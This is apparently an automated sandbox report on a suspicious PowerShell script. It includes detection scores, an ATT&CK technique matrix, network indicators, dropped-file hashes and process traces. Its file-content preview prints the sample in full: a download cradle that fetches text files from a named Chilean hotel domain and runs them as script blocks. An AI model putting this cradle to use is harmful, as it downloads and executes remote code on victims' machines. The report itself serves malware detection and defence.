Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.1087911633.00000000070CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1671720 Sample: WxEDf7a2Gy.ps1 Startdate: 23/04/2025 Architecture: WINDOWS Score: 48 11 www.hotellatitud33sur.cl 2->11 13 AI detected malicious Powershell script 2->13 15 Joe Sandbox ML detected suspicious sample 2->15 7 powershell.exe 15 19 2->7         started        signatures3 process4 process5 9 conhost.exe 7->9         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
WxEDf7a2Gy.ps10%VirustotalBrowse
WxEDf7a2Gy.ps10%ReversingLabs
SAMPLE100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.hotellatitud33sur.cl0%Avira URL Cloudsafe
https://www.hotellatitud33sur.clD0%Avira URL Cloudsafe
https://www.hotellatitud33sur.cl/image0%Avira URL Cloudsafe
http://crl.microJ0%Avira URL Cloudsafe
https://www.hotellatitud33sur.cl/images/01.txt0%Avira URL Cloudsafe
https://www.hotellatitud33sur.cl/images/02.txt0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
www.hotellatitud33sur.cl
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.hotellatitud33sur.cl/imagepowershell.exe, 00000000.00000002.1082391697.0000000004F9A000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://crl.microJpowershell.exe, 00000000.00000002.1087425147.0000000006FE0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        https://www.hotellatitud33sur.clDpowershell.exe, 00000000.00000002.1082391697.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          https://go.micropowershell.exe, 00000000.00000002.1082391697.0000000004F9A000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://contoso.com/powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://www.hotellatitud33sur.cl/images/02.txtpowershell.exe, 00000000.00000002.1081745972.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp, WxEDf7a2Gy.ps1false
                • Avira URL Cloud: safe
                unknown
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.hotellatitud33sur.clpowershell.exe, 00000000.00000002.1082391697.0000000004C6B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.microsoft.cpowershell.exe, 00000000.00000002.1087793854.00000000070B2000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://aka.ms/pscore6lBoqpowershell.exe, 00000000.00000002.1082391697.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.hotellatitud33sur.cl/images/01.txtpowershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1081745972.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp, WxEDf7a2Gy.ps1false
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1082391697.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            No contacted IP infos
                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1671720
                            Start date and time:2025-04-23 09:20:42 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:WxEDf7a2Gy.ps1
                            renamed because original name is a hash value
                            Original Sample Name:49ade2477364f9fd141a518374a93a7f940785739ce67abecad5bc7d7a18f19e.ps1
                            Detection:MAL
                            Classification:mal48.winPS1@2/5@1/0
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 11
                            • Number of non-executed functions: 5
                            Cookbook Comments:
                            • Found application associated with file extension: .ps1
                            • Stop behavior analysis, all processes terminated
                            • Execution Graph export aborted for target powershell.exe, PID 7040 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            TimeTypeDescription
                            03:21:39API Interceptor8x Sleep call for process: powershell.exe modified
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1510207563435464
                            Encrypted:false
                            SSDEEP:3:NlllulPki/llllZ:NllUcylll
                            MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                            SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                            SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                            SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e.................................^..............@..........
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6220
                            Entropy (8bit):3.748917257909586
                            Encrypted:false
                            SSDEEP:48:y0zsVeCgKoU2CXEukvhkvklCywRagUzLmKL7cLSogZoYc0zLmKL7cLSogZoY41:jWeCg2x1kvhkvCCtRYXtLDHn9XtLDHnK
                            MD5:A0CD27867B9BA9C9BFE445DE8C411799
                            SHA1:C2351927DAAC4EDB4D03430FB4C296452A046F61
                            SHA-256:3591598949E0887A4D9B90EB63055086DB4A833A4A669A6791A55D195392D6D6
                            SHA-512:0BC17C22396DD3CF0F9EDD6DDB32E50ABB42A53ECC6B190FE328DB5FA6C9FC945A3853B7B8FFE6985146EABFE1EDBCA9F6635418B28A2828010793E5BC179BEB
                            Malicious:false
                            Reputation:low
                            Preview:...................................FL..................F.".. ....N.5q....`'.r...z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....e.V ...qp.Z .......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Z.:...........................c..A.p.p.D.a.t.a...B.V.1......Z.:..Roaming.@......EW)N.Z.:..............................R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Z.:..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....gZ.m..Windows.@......EW)N.Z.:..........................y.~.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Z.:....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Z.:....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NgZXm..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)NEW(P................
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6220
                            Entropy (8bit):3.748917257909586
                            Encrypted:false
                            SSDEEP:48:y0zsVeCgKoU2CXEukvhkvklCywRagUzLmKL7cLSogZoYc0zLmKL7cLSogZoY41:jWeCg2x1kvhkvCCtRYXtLDHn9XtLDHnK
                            MD5:A0CD27867B9BA9C9BFE445DE8C411799
                            SHA1:C2351927DAAC4EDB4D03430FB4C296452A046F61
                            SHA-256:3591598949E0887A4D9B90EB63055086DB4A833A4A669A6791A55D195392D6D6
                            SHA-512:0BC17C22396DD3CF0F9EDD6DDB32E50ABB42A53ECC6B190FE328DB5FA6C9FC945A3853B7B8FFE6985146EABFE1EDBCA9F6635418B28A2828010793E5BC179BEB
                            Malicious:false
                            Reputation:low
                            Preview:...................................FL..................F.".. ....N.5q....`'.r...z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q....e.V ...qp.Z .......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Z.:...........................c..A.p.p.D.a.t.a...B.V.1......Z.:..Roaming.@......EW)N.Z.:..............................R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Z.:..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....gZ.m..Windows.@......EW)N.Z.:..........................y.~.W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)N.Z.:....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)N.Z.:....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NgZXm..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)NEW(P................
                            File type:ASCII text
                            Entropy (8bit):4.974635211176764
                            TrID:
                            • Generic INI configuration (1001/1) 100.00%
                            File name:WxEDf7a2Gy.ps1
                            File size:219 bytes
                            MD5:9403cd33d5c7ae6164025fcdd1c90a18
                            SHA1:3e06d2f60f0a42acd70e33188318f1673a52369b
                            SHA256:49ade2477364f9fd141a518374a93a7f940785739ce67abecad5bc7d7a18f19e
                            SHA512:2d55ccfda35f4207a04ac5e0636bc791c35315de1a6373e97a07440268579c4274cd7c8ff4f6450771989d3cc16e1020db606104ecad00244fee0fe29c3e591f
                            SSDEEP:3:KUiGPNs+ITH3x8yRISL8v7N44LUQAMhfPViGPNs+ITH3x8yRISL8v7N47HFSQAMV:FI+ILh8CvLy7ZLguI+ILh8CvLy7kMa
                            TLSH:49D05B930765E191435985556815921587431903595F56B9536C901501D63E24535288
                            File Content Preview:[scriptblock]::Create((Invoke-WebRequest 'https://www.hotellatitud33sur.cl/images/01.txt').Content).Invoke();.[scriptblock]::Create((Invoke-WebRequest 'https://www.hotellatitud33sur.cl/images/02.txt').Content).Invoke();

                            Download Network PCAP: filteredfull

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 23, 2025 09:21:41.163335085 CEST5330853192.168.2.101.1.1.1
                            Apr 23, 2025 09:21:41.433192015 CEST53533081.1.1.1192.168.2.10
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Apr 23, 2025 09:21:41.163335085 CEST192.168.2.101.1.1.10x279bStandard query (0)www.hotellatitud33sur.clA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Apr 23, 2025 09:21:41.433192015 CEST1.1.1.1192.168.2.100x279bName error (3)www.hotellatitud33sur.clnonenoneA (IP address)IN (0x0001)false
                            02468s020406080100

                            Click to jump to process

                            02468s0.00204060MB

                            Click to jump to process

                            • File
                            • Registry

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:03:21:38
                            Start date:23/04/2025
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1"
                            Imagebase:0x4d0000
                            File size:433'152 bytes
                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Target ID:1
                            Start time:03:21:39
                            Start date:23/04/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff60c8c0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Executed Functions

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'oq$4'oq$4'oq$4'oq
                            • API String ID: 0-2906056167
                            • Opcode ID: 85d690d28e4a12548de37dfa71fc751511aa99e17a7cd901d8fb1cb5b7e58d09
                            • Instruction ID: fbf20a6ca3a736433a14324af5e0a7fe642eccb62b26cc2e08db58d2b04870a3
                            • Opcode Fuzzy Hash: 85d690d28e4a12548de37dfa71fc751511aa99e17a7cd901d8fb1cb5b7e58d09
                            • Instruction Fuzzy Hash: 63126AF170430AAFEB218B6888027AABBB6DFC6314F14807AD549DF791DB35C945C7A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d1dbe61ee6954e298f0389f4710a473fac0925b7ece3f63e3659b0b792d3511
                            • Instruction ID: edc94e518cbce2b992e172a9dfa14b8b5dfdb4e480fe6a789e85912c322dc7a7
                            • Opcode Fuzzy Hash: 2d1dbe61ee6954e298f0389f4710a473fac0925b7ece3f63e3659b0b792d3511
                            • Instruction Fuzzy Hash: 1EE1F974A00219AFDB54DF98D484A9DFBF6FF88320F258569E805AB751C731ED81CB90
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c3b26d530c882ae9380a76a6f4e9d8a22a60260e02b618b2d084cb0a2dcbcb26
                            • Instruction ID: 93ff847b5d33e75cb199f1453cb3dff9ec23a657f7ce451da6414798df886216
                            • Opcode Fuzzy Hash: c3b26d530c882ae9380a76a6f4e9d8a22a60260e02b618b2d084cb0a2dcbcb26
                            • Instruction Fuzzy Hash: DC918C74A002099FCB15CF59C494ABEFBB5FF88310B2486A9D915AB3A5C735FC51CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65ef557c2db9545e62bd86e57aab7c47d6a210293f65fe06142f5a74f7436d4d
                            • Instruction ID: 436e16f44dcf6854bb4827762461b9da2cbc0d4c8fdfb6855598945615c5d2c5
                            • Opcode Fuzzy Hash: 65ef557c2db9545e62bd86e57aab7c47d6a210293f65fe06142f5a74f7436d4d
                            • Instruction Fuzzy Hash: F141F7F1A0431AAFEB208F188903BAA7BBBEF85314F1540A9D4489F755C735D944CBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c662ff934942193e3f8994f9172656b364f589b304418b32840d6e4c67be38d
                            • Instruction ID: 809dcfeef2283a1c695c125bdc628aeb3a771e8a7923999e5f516d672b55b1c4
                            • Opcode Fuzzy Hash: 5c662ff934942193e3f8994f9172656b364f589b304418b32840d6e4c67be38d
                            • Instruction Fuzzy Hash: 4D412874A105059FCB05CF59C498ABEFBB5FF48310B2586A9D816AB364C732FC91CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 126102952747d9d5c1e6eeb880a32c10fc9a5e5877d29c5c47958b34596ed4f5
                            • Instruction ID: 542a39f24a9cc0f59094887dcbd51d70b34f20886307a3696263a5bd78c4c485
                            • Opcode Fuzzy Hash: 126102952747d9d5c1e6eeb880a32c10fc9a5e5877d29c5c47958b34596ed4f5
                            • Instruction Fuzzy Hash: 7A414C74A105059FCB05CF59C0989BEFBB5FF48310B2586A9D815AB364C732FC51CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20e99a88dd7b7bd1eda05933cdbb66f1d1d24d54b0494e83e3654944110b3931
                            • Instruction ID: 97b842cbac6ed5c96e560124e92807c66fb9ba85eaa67c88caa9c24d27b4838b
                            • Opcode Fuzzy Hash: 20e99a88dd7b7bd1eda05933cdbb66f1d1d24d54b0494e83e3654944110b3931
                            • Instruction Fuzzy Hash: EF211974A00209AFCB44DF59C8809AAFBB5FF88320B158669E919E7761C731EC41CBA0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2165aaf947d5b1bb6298b2be1e6e0370dedfa14c1bfa5c670cdb4f4caac30c03
                            • Instruction ID: 1a8dc20a072e9ced9a4e5a8ac8401b50262f5f13daa4ebe7077aa8bd3c57bae0
                            • Opcode Fuzzy Hash: 2165aaf947d5b1bb6298b2be1e6e0370dedfa14c1bfa5c670cdb4f4caac30c03
                            • Instruction Fuzzy Hash: 8D212CB4A052199FCB00CF99C4809AAFBB5FF49310B14859AD519EB352C735ED41CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1082290137.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_4970000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5fa5fd94d7b75cd9d054014eb76bcebeb4a033b3c17a72c5abd25927729be0b3
                            • Instruction ID: ddd25617df6e70f140eaebaa11499aeb8d42e69186e0bb384021662a04923044
                            • Opcode Fuzzy Hash: 5fa5fd94d7b75cd9d054014eb76bcebeb4a033b3c17a72c5abd25927729be0b3
                            • Instruction Fuzzy Hash: 07211774A042099FCB00DF98D4909AAFBF5FF49310B1581AAE919EB352D732FD41CBA1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1081964145.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_449d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1d64f1eb6b99d56e8f09f376b51eac1676df2c2fdb5b791679ab01c233afea2
                            • Instruction ID: 36344acd2944ac4b8c89a1d1dd7f529da7ecacf8374db10d5cd2340323b2e6cf
                            • Opcode Fuzzy Hash: b1d64f1eb6b99d56e8f09f376b51eac1676df2c2fdb5b791679ab01c233afea2
                            • Instruction Fuzzy Hash: 4D01526140E3C05FEB124B259D94B52BFB4DF43224F1DC4DBD9888F293C2699849C772
                            Memory Dump Source
                            • Source File: 00000000.00000002.1081964145.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_449d000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 549e5c6ec14bf278817c77e14a1f3fe42e0f783046806387e1ec331d71f0da90
                            • Instruction ID: 03a0878e5255aad3751d2e7822b7bda9897e972a2a5c216cdb52c8fbf2cb0530
                            • Opcode Fuzzy Hash: 549e5c6ec14bf278817c77e14a1f3fe42e0f783046806387e1ec331d71f0da90
                            • Instruction Fuzzy Hash: EC01F7B1904304BAEF204E15EC80B67BFD8DF41328F08C51BED085B242D279AC46DAB1

                            Non-executed Functions

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1088313787.00000000073A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073A0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_73a0000_powershell.jbxd
                            Similarity
                            • API ID:
